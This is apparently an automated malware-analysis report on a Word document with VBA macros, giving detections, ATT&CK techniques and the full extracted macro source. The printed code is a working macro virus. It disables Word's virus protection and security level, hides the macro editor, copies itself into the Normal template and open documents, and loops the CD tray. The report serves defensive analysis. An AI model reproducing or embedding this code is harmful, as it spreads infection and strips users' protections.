MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a Microsoft Word document containing VBA macros. The macro attempts to disable security settings and write its own code to a file named 'C:\hjg.FKH' before attempting to save it to the active document and the Normal template. This behavior suggests an attempt to establish persistence or facilitate further infection. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Win.Trojan.C-286' further indicate malicious intent.
Heuristics 2
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2218 bytes |
SHA-256: 15425e1680d84c74addc0cf1a2dabad9a44ed104acd43c22a5f2016968b451d8 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'
' Virus Name : hjg
' Virus Author : The WalruS Virus Engine (WVE) Random Virus Utility
' A Virus Created By The WalruS Virus Engine (WVE)
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub FilePrintDefault()
Call USB2628
End Sub
Private Sub USB2628()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
ActiveDocument.ReadOnlyRecommended = False
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Set FCN8359 = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set HPO6156 = ActiveDocument.VBProject.VBComponents(1).CodeModule
ISA6399 = "C:\hjg.FKH"
Open ISA6399 For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 0)
Close #1
If FCN8359.Lines(1, 1) <> "'" Then
FCN8359.DeleteLines 1, FCN8359.CountOfLines: FCN8359.AddFromFile ISA6399
End If
If HPO6156.Lines(1, 1) <> "'" Then
HPO6156.DeleteLines 1, HPO6156.CountOfLines: HPO6156.AddFromFile ISA6399
ActiveDocument.Save
End If
Kill ISA6399
ESR8101 = Int(Rnd * 44)
If Trigger = 3 Then Call ELA9086
End Sub
Private Sub ELA9086()
On Error Resume Next
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub
' Another Virus Created By The WalruS Virus Generator (WVE) Version 1.10
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.